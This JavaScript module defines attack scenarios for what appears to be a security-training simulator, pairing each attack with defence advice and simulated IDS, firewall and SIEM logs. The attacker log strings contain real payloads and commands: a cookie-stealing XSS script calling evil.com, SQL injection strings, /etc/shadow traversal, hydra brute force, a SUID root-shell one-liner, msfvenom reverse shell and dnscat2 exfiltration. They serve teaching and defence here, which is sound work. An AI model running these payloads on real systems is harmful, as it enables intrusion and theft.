/**
 * Predefined attack scenarios for the Attack Simulator and Sandbox modules.
 */

export const ATTACK_SCENARIOS = [
  // ── Reconnaissance ────────────────────────────────────────────
  {
    id: 'port-scan',
    name: 'Port Scan (Nmap)',
    icon: '🔍',
    category: 'Reconnaissance',
    color: 'text-cyan-400',
    border: 'border-cyan-400/30',
    bg: 'bg-cyan-400/10',
    severity: 'medium',
    compatibleTargets: ['web-server', 'db-server', 'windows-workstation', 'iot-device'],
    description: 'Runs a full Nmap sweep to fingerprint open ports, running services, and OS versions. First step in most attack chains.',
    defenseStrategy: 'Deploy a host-based firewall with default-deny rules. Enable port-scan detection in your IDS. Restrict external access to only required ports.',
    phases: [
      { label: 'Host Discovery',    duration: 600  },
      { label: 'SYN Scan (-sS)',    duration: 1000 },
      { label: 'Service Probe',     duration: 900  },
      { label: 'OS Fingerprinting', duration: 700  },
    ],
    logTemplates: [
      { type: 'attacker', messages: ['nmap -sS -sV -O {ip}', 'Open: 22/tcp ssh OpenSSH 8.9', 'Open: 80/tcp http nginx/1.24', 'OS guess: Linux 5.x (97% confidence)'] },
      { type: 'ids',      messages: ['NOTICE: Port scan from {attacker_ip}', 'SYN packets to 65535 ports in 8s', 'Signature: Nmap OS detection probe'] },
      { type: 'firewall', messages: ['Stealth scan detected from {attacker_ip}', 'Logging all SYN without ACK', 'Source throttled: 10 pkt/s max from {attacker_ip}'] },
      { type: 'siem',     messages: ['[MEDIUM] Recon scan from {attacker_ip}', 'Added to watchlist: {attacker_ip}', 'Correlating with threat intel feed'] },
    ],
    alertLevel: 'medium',
  },
  {
    id: 'osint-harvest',
    name: 'OSINT Harvesting',
    icon: '🕵️',
    category: 'Reconnaissance',
    color: 'text-cyan-400',
    border: 'border-cyan-400/30',
    bg: 'bg-cyan-400/10',
    severity: 'low',
    compatibleTargets: ['web-server', 'windows-workstation'],
    description: 'Harvests publicly available email addresses, subdomains, and employee data to build a target profile before active exploitation.',
    defenseStrategy: 'Implement email address obfuscation on public sites. Monitor for domain-related OSINT queries. Enforce a strict social-media information-sharing policy.',
    phases: [
      { label: 'DNS Enumeration',   duration: 700  },
      { label: 'Email Harvesting',  duration: 900  },
      { label: 'LinkedIn Scraping', duration: 600  },
      { label: 'Profile Assembly',  duration: 500  },
    ],
    logTemplates: [
      { type: 'attacker', messages: ['theHarvester -d target.com -b google', 'Found: admin@target.com, dev@target.com', 'Subdomain: vpn.target.com, mail.target.com', 'LinkedIn: 47 employees enumerated'] },
      { type: 'ids',      messages: ['NOTICE: DNS zone-transfer attempt blocked', 'Anomaly: 200+ subdomain lookups in 60s'] },
      { type: 'firewall', messages: ['DNS query rate-limit applied to {attacker_ip}', 'Zone transfer blocked from {attacker_ip}'] },
      { type: 'siem',     messages: ['[LOW] OSINT activity pattern detected', 'Monitoring {attacker_ip} for follow-up attacks'] },
    ],
    alertLevel: 'low',
  },

  // ── Web Exploits ───────────────────────────────────────────────
  {
    id: 'sql-injection',
    name: 'SQL Injection',
    icon: '💉',
    category: 'Web Exploit',
    color: 'text-amber-400',
    border: 'border-amber-400/30',
    bg: 'bg-amber-400/10',
    severity: 'high',
    compatibleTargets: ['web-server', 'db-server'],
    description: 'Injects malicious SQL payloads into input fields to extract or corrupt database records. Can lead to full data exfiltration.',
    defenseStrategy: 'Use parameterised queries / prepared statements. Deploy a Web Application Firewall. Sanitise all user inputs server-side and apply least-privilege DB accounts.',
    phases: [
      { label: 'Reconnaissance',    duration: 800  },
      { label: 'Payload Crafting',  duration: 1000 },
      { label: 'Injection',         duration: 1200 },
      { label: 'Data Exfiltration', duration: 900  },
    ],
    logTemplates: [
      { type: 'attacker', messages: ["sqlmap -u 'http://{ip}/login' --dbs", "Testing payloads: ' OR '1'='1", 'UNION SELECT NULL,NULL,NULL--', "Payload: ' OR 1=1;DROP TABLE users--"] },
      { type: 'ids',      messages: ['ALERT: SQL injection attempt on /login', 'Signature match: UNION SELECT pattern', 'Blocked: \' OR 1=1 payload from {attacker_ip}'] },
      { type: 'firewall', messages: ['WAF rule 8001 triggered: SQL keyword in body', 'Rate limit applied to {attacker_ip}', 'Connection to DB port 3306 blocked'] },
      { type: 'siem',     messages: ['[HIGH] SQLi campaign detected — 47 blocked payloads', 'Correlating with prior recon from {attacker_ip}', 'Alert escalated to Tier 2 analyst'] },
    ],
    alertLevel: 'high',
  },
  {
    id: 'xss',
    name: 'Stored XSS Attack',
    icon: '📝',
    category: 'Web Exploit',
    color: 'text-amber-400',
    border: 'border-amber-400/30',
    bg: 'bg-amber-400/10',
    severity: 'high',
    compatibleTargets: ['web-server'],
    description: 'Injects a persistent malicious script into a web application that executes in the browsers of every user who visits the affected page.',
    defenseStrategy: 'Implement a strict Content Security Policy (CSP). Encode all user-supplied output. Use HttpOnly and Secure cookie flags.',
    phases: [
      { label: 'Input Discovery',   duration: 700  },
      { label: 'Payload Injection', duration: 900  },
      { label: 'Script Storage',    duration: 500  },
      { label: 'Session Hijack',    duration: 1000 },
    ],
    logTemplates: [
      { type: 'attacker', messages: ['Submitting payload: <script>document.location=\'http://evil.com/?c=\'+document.cookie</script>', 'Payload stored in comment field', 'Session token harvested from victim browser'] },
      { type: 'ids',      messages: ['ALERT: XSS payload detected in POST /comments', 'Script tag injection blocked by WAF rule 5500', 'Anomaly: cookie data exfiltration attempt'] },
      { type: 'firewall', messages: ['WAF: blocked <script> in request body', 'Outbound connection to evil.com blocked'] },
      { type: 'siem',     messages: ['[HIGH] Stored XSS exploit on {ip}', 'Affected endpoint: /comments — patching recommended', 'Session token stolen — force re-auth initiated'] },
    ],
    alertLevel: 'high',
  },
  {
    id: 'lfi',
    name: 'Local File Inclusion',
    icon: '📂',
    category: 'Web Exploit',
    color: 'text-amber-400',
    border: 'border-amber-400/30',
    bg: 'bg-amber-400/10',
    severity: 'high',
    compatibleTargets: ['web-server'],
    description: 'Exploits unsanitised file path parameters to read sensitive server-side files like /etc/passwd or config files.',
    defenseStrategy: 'Validate and whitelist all file path inputs. Disable allow_url_include in PHP. Run web server under a restricted user with minimal filesystem permissions.',
    phases: [
      { label: 'Path Probing',      duration: 600  },
      { label: 'Traversal Test',    duration: 800  },
      { label: 'File Read',         duration: 900  },
      { label: 'Credential Extract',duration: 700  },
    ],
    logTemplates: [
      { type: 'attacker', messages: ['GET /view?file=../../../../etc/passwd', 'GET /view?file=../../../../etc/shadow', 'Response: root:x:0:0:root:/root:/bin/bash', 'GET /view?file=../config/database.php'] },
      { type: 'ids',      messages: ['ALERT: Path traversal in GET /view', 'Signature: ../../../../ detected', 'Blocked: /etc/passwd read attempt'] },
      { type: 'firewall', messages: ['WAF rule 7200: path traversal blocked', 'Request sanitised: ../ stripped from parameter'] },
      { type: 'siem',     messages: ['[HIGH] LFI attempt on web server {ip}', 'Sensitive file access blocked — /etc/shadow', 'Dev team notified for immediate patch'] },
    ],
    alertLevel: 'high',
  },

  // ── Credential Attacks ─────────────────────────────────────────
  {
    id: 'brute-force',
    name: 'Brute Force (SSH/RDP)',
    icon: '🔨',
    category: 'Credential Attack',
    color: 'text-purple-400',
    border: 'border-purple-400/30',
    bg: 'bg-purple-400/10',
    severity: 'high',
    compatibleTargets: ['web-server', 'windows-workstation', 'db-server'],
    description: 'Systematically tries thousands of credentials from a wordlist to gain unauthorised access via SSH or RDP.',
    defenseStrategy: 'Enforce MFA on all remote access. Implement account lockout after 5 failures. Use fail2ban or similar to auto-ban brute-force IPs.',
    phases: [
      { label: 'Wordlist Loading',  duration: 600  },
      { label: 'Auth Hammering',    duration: 1500 },
      { label: 'Account Lockout',   duration: 700  },
      { label: 'Credential Dump',   duration: 900  },
    ],
    logTemplates: [
      { type: 'attacker', messages: ['hydra -l root -P rockyou.txt {ip} ssh', 'Trying admin:password123 — FAIL', 'Trying root:toor — FAIL', 'Trying admin:admin — SUCCESS on attempt 3,847'] },
      { type: 'ids',      messages: ['ALERT: 3,847 failed SSH logins in 60s', 'Signature: credential stuffing from {attacker_ip}', "Account 'admin' locked after 10 failures"] },
      { type: 'firewall', messages: ['Blocked: {attacker_ip} — too many auth failures', 'Rule added: deny SSH from {attacker_ip}/16', 'Port 22 temporarily restricted to allowlist'] },
      { type: 'siem',     messages: ['[HIGH] Brute-force campaign — 4k+ attempts in 2 minutes', 'Threat intel match: known botnet IP range', 'MFA enforcement triggered for all accounts'] },
    ],
    alertLevel: 'high',
  },
  {
    id: 'credential-stuffing',
    name: 'Credential Stuffing',
    icon: '🗂️',
    category: 'Credential Attack',
    color: 'text-purple-400',
    border: 'border-purple-400/30',
    bg: 'bg-purple-400/10',
    severity: 'high',
    compatibleTargets: ['web-server', 'windows-workstation'],
    description: 'Uses breached username/password pairs from public data leaks to gain access to accounts where users reuse passwords.',
    defenseStrategy: 'Require MFA for all logins. Check passwords against known-breach databases (e.g., HaveIBeenPwned API). Implement CAPTCHA and rate-limiting on login endpoints.',
    phases: [
      { label: 'Breach DB Load',    duration: 500  },
      { label: 'Combo Testing',     duration: 1600 },
      { label: 'Valid Pair Found',  duration: 600  },
      { label: 'Account Takeover',  duration: 800  },
    ],
    logTemplates: [
      { type: 'attacker', messages: ['Loading 14M combos from Collection #1 breach', 'Testing: john.doe@target.com:P@ssw0rd2021', '1,204 valid combos found across 3 domains', 'Logging into admin panel: SUCCESS'] },
      { type: 'ids',      messages: ['ALERT: Distributed login attempts — 200 IPs', 'Signature: credential stuffing pattern', 'Anomaly: login success rate spike 0.2% → 8.6%'] },
      { type: 'firewall', messages: ['Rate-limit applied to /login endpoint', 'CAPTCHA challenge served to {attacker_ip}', 'GeoIP block applied: 14 countries restricted'] },
      { type: 'siem',     messages: ['[HIGH] Credential stuffing — 14M combos tested', 'Breach correlation: Collection #1 dataset', 'Forced password-reset notice sent to 1,204 users'] },
    ],
    alertLevel: 'high',
  },

  // ── Network Attacks ────────────────────────────────────────────
  {
    id: 'ddos',
    name: 'DDoS Flood',
    icon: '🌊',
    category: 'DoS / DDoS',
    color: 'text-red-400',
    border: 'border-red-400/30',
    bg: 'bg-red-400/10',
    severity: 'critical',
    compatibleTargets: ['web-server', 'windows-workstation', 'iot-device'],
    description: 'Floods the target with massive packet volumes via a botnet to exhaust bandwidth and crash exposed services.',
    defenseStrategy: 'Deploy upstream DDoS scrubbing / CDN protection (e.g., Cloudflare). Configure SYN cookies. Implement rate-limiting at the network edge.',
    phases: [
      { label: 'Botnet Assembly',      duration: 700  },
      { label: 'SYN Flood',            duration: 1400 },
      { label: 'UDP Amplification',    duration: 1100 },
      { label: 'Service Degradation',  duration: 800  },
    ],
    logTemplates: [
      { type: 'attacker', messages: ['Initiating SYN flood — 50,000 pkt/s', 'UDP amplification via DNS reflectors', 'Botnet activated: 1,200 nodes online', 'Sending ICMP flood to {ip}'] },
      { type: 'firewall', messages: ['BLOCKED: SYN flood from 1,200 sources', 'Rate limiting: 50k → 200 pkt/s', 'Black-hole routing activated for {attacker_ip}', 'Upstream ISP null-route request sent'] },
      { type: 'ids',      messages: ['CRITICAL: DDoS signature — pps threshold exceeded', 'Geo-block applied: AS{asn}', 'Anomaly: 98% traffic from spoofed IPs'] },
      { type: 'siem',     messages: ['[CRITICAL] DDoS attack in progress — bandwidth 9.8 Gbps', 'CDN scrubbing centre activated', 'NOC on-call notified — SLA at risk'] },
    ],
    alertLevel: 'critical',
  },
  {
    id: 'mitm',
    name: 'Man-in-the-Middle',
    icon: '👁️',
    category: 'Network Attack',
    color: 'text-orange-400',
    border: 'border-orange-400/30',
    bg: 'bg-orange-400/10',
    severity: 'critical',
    compatibleTargets: ['web-server', 'windows-workstation', 'iot-device'],
    description: 'Performs ARP poisoning to intercept and inspect encrypted traffic between the target and gateway, enabling credential capture.',
    defenseStrategy: 'Enable Dynamic ARP Inspection (DAI) on managed switches. Enforce HTTPS with HSTS. Use mutual TLS (mTLS) for service-to-service communication.',
    phases: [
      { label: 'ARP Poisoning',     duration: 800  },
      { label: 'Traffic Intercept', duration: 1200 },
      { label: 'SSL Stripping',     duration: 1000 },
      { label: 'Data Capture',      duration: 900  },
    ],
    logTemplates: [
      { type: 'attacker', messages: ['arpspoof -i eth0 -t {ip} 10.0.0.1', 'SSLstrip listening on :8080', 'Captured: POST /login — creds: admin:P@ssw0rd!', 'ARP cache poisoned on {ip}'] },
      { type: 'ids',      messages: ['ALERT: Duplicate ARP replies for 10.0.0.1', 'MITM signature: ARP poisoning detected', 'TLS downgrade attempt on {ip}'] },
      { type: 'firewall', messages: ['Dynamic ARP Inspection triggered', 'Rogue ARP entry blocked on VLAN 10', 'SSL inspection forced — stripping blocked'] },
      { type: 'siem',     messages: ['[CRITICAL] MITM attack in progress on {ip}', 'Credential capture likely — force password reset', 'Network isolation recommended for {ip}'] },
    ],
    alertLevel: 'critical',
  },
  {
    id: 'smb-exploit',
    name: 'EternalBlue (SMB)',
    icon: '💣',
    category: 'Network Exploit',
    color: 'text-red-400',
    border: 'border-red-400/30',
    bg: 'bg-red-400/10',
    severity: 'critical',
    compatibleTargets: ['windows-workstation', 'db-server'],
    description: 'Exploits the MS17-010 SMBv1 vulnerability to achieve remote code execution without any credentials.',
    defenseStrategy: 'Disable SMBv1 immediately. Apply MS17-010 patch. Block port 445 at the perimeter firewall and segment internal networks.',
    phases: [
      { label: 'SMB Discovery',     duration: 700  },
      { label: 'Vuln Fingerprint',  duration: 900  },
      { label: 'Exploit Delivery',  duration: 1300 },
      { label: 'Shell Established', duration: 800  },
    ],
    logTemplates: [
      { type: 'attacker', messages: ['Scanning for SMBv1 on port 445', 'MS17-010 vulnerable: {ip} confirmed', 'Sending EternalBlue exploit buffer', 'SYSTEM shell established on {ip}'] },
      { type: 'ids',      messages: ['CRITICAL: EternalBlue exploit attempt on {ip}', 'SMBv1 buffer overflow signature matched', 'Lateral movement blocked — port 445 restricted'] },
      { type: 'firewall', messages: ['Port 445 inbound blocked from {attacker_ip}', 'SMBv1 session terminated', 'Patch status: MS17-010 NOT APPLIED on {ip}'] },
      { type: 'siem',     messages: ['[CRITICAL] EternalBlue on {ip} — RCE risk', 'Initiating IR playbook: ransomware-precursor', 'Host {ip} quarantined pending investigation'] },
    ],
    alertLevel: 'critical',
  },

  // ── Social Engineering ─────────────────────────────────────────
  {
    id: 'phishing',
    name: 'Spear Phishing',
    icon: '🎣',
    category: 'Social Engineering',
    color: 'text-pink-400',
    border: 'border-pink-400/30',
    bg: 'bg-pink-400/10',
    severity: 'high',
    compatibleTargets: ['windows-workstation', 'web-server'],
    description: 'Sends a targeted phishing email impersonating a trusted sender to trick users into clicking a malicious link or macro-enabled attachment.',
    defenseStrategy: 'Deploy email filtering with DMARC/DKIM/SPF validation. Conduct regular phishing awareness training. Sandbox all email attachments before delivery.',
    phases: [
      { label: 'Target Profiling',  duration: 600  },
      { label: 'Email Crafting',    duration: 800  },
      { label: 'Delivery',          duration: 500  },
      { label: 'Payload Execution', duration: 1100 },
    ],
    logTemplates: [
      { type: 'attacker', messages: ['Crafting lure: "Urgent: HR Policy Update" from hr@target-corp.co', 'Embedding GoPhish payload in .docx macro', 'Email delivered to 47 targets', 'Victim clicked link — payload executing'] },
      { type: 'ids',      messages: ['ALERT: Malicious macro execution on {ip}', 'Outbound C2 beacon to 185.220.x.x detected', 'Process: winword.exe spawning cmd.exe'] },
      { type: 'firewall', messages: ['C2 domain blocked: update-service.xyz', 'Macro execution blocked by Group Policy', 'Outbound DNS to malicious domain suppressed'] },
      { type: 'siem',     messages: ['[HIGH] Phishing payload executed on {ip}', 'User account potentially compromised', 'Email gateway quarantine rule applied retroactively'] },
    ],
    alertLevel: 'high',
  },

  // ── Malware ────────────────────────────────────────────────────
  {
    id: 'ransomware',
    name: 'Ransomware Drop',
    icon: '🔒',
    category: 'Malware',
    color: 'text-red-400',
    border: 'border-red-400/30',
    bg: 'bg-red-400/10',
    severity: 'critical',
    compatibleTargets: ['windows-workstation', 'db-server'],
    description: 'Deploys an encrypted payload that locks files and demands a ransom for decryption keys. Spreads laterally via SMB shares.',
    defenseStrategy: 'Maintain offline backups (3-2-1 rule). Deploy EDR with ransomware behavioural detection. Restrict VSS deletion and mass file rename operations via AppLocker.',
    phases: [
      { label: 'Initial Access',     duration: 900  },
      { label: 'Lateral Movement',   duration: 1100 },
      { label: 'Payload Encryption', duration: 1400 },
      { label: 'Ransom Note Drop',   duration: 600  },
    ],
    logTemplates: [
      { type: 'attacker', messages: ['Executing dropper via phishing macro', 'Enumerating SMB shares on {ip}', 'Encrypting: C:\\Users\\**\\*.docx ★★★', 'Dropping ransom note: README_DECRYPT.txt'] },
      { type: 'ids',      messages: ['CRITICAL: Mass file rename detected (.locked extension)', 'Anomaly: SMB traffic spike on {ip}', 'Process: cmd.exe spawning vssadmin — BLOCKED'] },
      { type: 'firewall', messages: ['C2 callback to 185.220.101.x BLOCKED', 'Egress rule applied — isolating {ip}', 'VSS deletion attempt blocked by EDR'] },
      { type: 'siem',     messages: ['[CRITICAL] Ransomware behaviour on {ip}', 'Initiating IR playbook: ransomware-001', 'Snapshot backup triggered — 3 mins ago'] },
    ],
    alertLevel: 'critical',
  },
  {
    id: 'zero-day',
    name: 'Zero-Day Exploit',
    icon: '☢️',
    category: 'Malware',
    color: 'text-red-400',
    border: 'border-red-400/30',
    bg: 'bg-red-400/10',
    severity: 'critical',
    compatibleTargets: ['web-server', 'windows-workstation', 'db-server', 'iot-device'],
    description: 'Exploits an unpatched, previously unknown vulnerability in a core service, bypassing all signature-based defences entirely.',
    defenseStrategy: 'Deploy behaviour-based EDR / XDR that does not rely on signatures. Use virtual patching via WAF rules. Apply network micro-segmentation to limit blast radius.',
    phases: [
      { label: 'Vuln Research',     duration: 1000 },
      { label: 'Exploit Craft',     duration: 1400 },
      { label: 'Payload Delivery',  duration: 900  },
      { label: 'RCE Established',   duration: 800  },
    ],
    logTemplates: [
      { type: 'attacker', messages: ['Loading custom 0-day for CVE-2025-XXXX', 'Target service: {ip}:443 — nginx 1.24.0', 'Sending crafted TLS ClientHello overflow', 'RCE confirmed — /bin/sh spawned as www-data'] },
      { type: 'ids',      messages: ['UNKNOWN signature — no rule match', 'Anomaly: unexpected process spawn on {ip}', 'Behavioural alert: privilege escalation post-RCE'] },
      { type: 'firewall', messages: ['Anomalous TLS handshake flagged from {attacker_ip}', 'Outbound shell detected — connection terminated', 'Virtual patch applied via WAF — CVE-2025-XXXX'] },
      { type: 'siem',     messages: ['[CRITICAL] Zero-day exploit confirmed on {ip}', 'No AV signature available — EDR behavioural block', 'Threat intel feed updated — IOC shared with ISAC'] },
    ],
    alertLevel: 'critical',
  },

  // ── Post-Exploitation ──────────────────────────────────────────
  {
    id: 'privilege-escalation',
    name: 'Privilege Escalation',
    icon: '⬆️',
    category: 'Post-Exploitation',
    color: 'text-orange-400',
    border: 'border-orange-400/30',
    bg: 'bg-orange-400/10',
    severity: 'critical',
    compatibleTargets: ['windows-workstation', 'db-server', 'web-server'],
    description: 'Abuses misconfigured SUID binaries or kernel vulnerabilities to escalate from a low-privilege user account to root/SYSTEM.',
    defenseStrategy: 'Audit SUID binaries and remove unnecessary ones. Keep OS kernels patched. Apply principle of least privilege and use PAM to restrict sudo access.',
    phases: [
      { label: 'Foothold Gained',    duration: 700  },
      { label: 'Enum (LinPEAS)',     duration: 1000 },
      { label: 'Exploit Kernel',     duration: 1100 },
      { label: 'Root Shell',         duration: 600  },
    ],
    logTemplates: [
      { type: 'attacker', messages: ['Running linpeas.sh on {ip}', 'Found: /usr/bin/python3 SUID set — misconfigured!', 'python3 -c "import os; os.setuid(0); os.system(\'/bin/sh\')"', 'uid=0(root) — privilege escalation successful!'] },
      { type: 'ids',      messages: ['ALERT: SUID abuse detected on {ip}', 'Process: python3 spawned root shell', 'Kernel exploit attempt: CVE-2023-0386 DirtyCred'] },
      { type: 'firewall', messages: ['Outbound root-shell beacon blocked', 'EDR: privilege escalation chain terminated'] },
      { type: 'siem',     messages: ['[CRITICAL] Root-level access on {ip}', 'Audit: SUID misconfiguration on /usr/bin/python3', 'IR team engaged — host isolation in progress'] },
    ],
    alertLevel: 'critical',
  },
  {
    id: 'reverse-shell',
    name: 'Reverse Shell Payload',
    icon: '🐚',
    category: 'Post-Exploitation',
    color: 'text-red-400',
    border: 'border-red-400/30',
    bg: 'bg-red-400/10',
    severity: 'critical',
    compatibleTargets: ['web-server', 'windows-workstation', 'db-server'],
    description: 'Drops a reverse shell payload that calls back to the attacker, establishing a persistent interactive session through egress-filtered firewalls.',
    defenseStrategy: 'Block all unexpected outbound connections with egress filtering. Deploy EDR to detect shell spawning. Monitor for unusual process trees (e.g., httpd spawning bash).',
    phases: [
      { label: 'Payload Generation', duration: 600  },
      { label: 'Upload & Execute',   duration: 900  },
      { label: 'C2 Callback',        duration: 800  },
      { label: 'Interactive Shell',  duration: 700  },
    ],
    logTemplates: [
      { type: 'attacker', messages: ['msfvenom -p linux/x64/shell_reverse_tcp LHOST={attacker_ip} LPORT=4444', 'Uploading payload via LFI write', 'nc -lvnp 4444 — waiting for callback...', 'Connection received from {ip}:51234 — shell active!'] },
      { type: 'ids',      messages: ['CRITICAL: Reverse shell detected from {ip}', 'Outbound raw socket to {attacker_ip}:4444', 'Process lineage: nginx → bash → nc'] },
      { type: 'firewall', messages: ['Egress rule: outbound port 4444 BLOCKED', 'C2 IP {attacker_ip} added to block list', 'Process net connection attempt killed by EDR'] },
      { type: 'siem',     messages: ['[CRITICAL] Shell callback from {ip} to {attacker_ip}', 'Web shell artifact found: /var/www/html/shell.php', 'Host {ip} isolated — forensic imaging queued'] },
    ],
    alertLevel: 'critical',
  },
  {
    id: 'data-exfiltration',
    name: 'Data Exfiltration (DNS)',
    icon: '📤',
    category: 'Post-Exploitation',
    color: 'text-orange-400',
    border: 'border-orange-400/30',
    bg: 'bg-orange-400/10',
    severity: 'critical',
    compatibleTargets: ['db-server', 'windows-workstation', 'web-server'],
    description: 'Encodes and exfiltrates sensitive data over DNS queries to bypass DLP and firewall controls that permit DNS traffic.',
    defenseStrategy: 'Deploy DNS monitoring / RPZ (Response Policy Zones) to detect tunnelling. Block DNS queries to non-authorised resolvers. Implement DLP on egress traffic.',
    phases: [
      { label: 'Data Staging',      duration: 700  },
      { label: 'DNS Encoding',      duration: 800  },
      { label: 'Tunnelled Exfil',   duration: 1300 },
      { label: 'C2 Confirmation',   duration: 500  },
    ],
    logTemplates: [
      { type: 'attacker', messages: ['Staging DB dump: 2.1 GB customer records', 'Encoding via dnscat2 to attacker.evil.com', 'Query: c3VzZXJzLmNzdg==.attacker.evil.com TXT', 'Exfil complete — 2.1 GB transferred over DNS'] },
      { type: 'ids',      messages: ['ALERT: DNS tunnelling detected from {ip}', 'Anomaly: TXT queries with high entropy strings', 'DNS exfil signature matched — dnscat2 pattern'] },
      { type: 'firewall', messages: ['DNS-over-HTTPS blocked to unknown resolvers', 'RPZ: attacker.evil.com → NXDOMAIN', 'Outbound DNS rate-limited: 10 q/s from {ip}'] },
      { type: 'siem',     messages: ['[CRITICAL] Data exfiltration via DNS on {ip}', 'Estimated data lost: 2.1 GB', 'Regulatory breach notification triggered — GDPR Art. 33'] },
    ],
    alertLevel: 'critical',
  },
];

export function getScenarioById(id) {
  return ATTACK_SCENARIOS.find(s => s.id === id) || null;
}

export const SCENARIO_CATEGORIES = [...new Set(ATTACK_SCENARIOS.map(s => s.category))];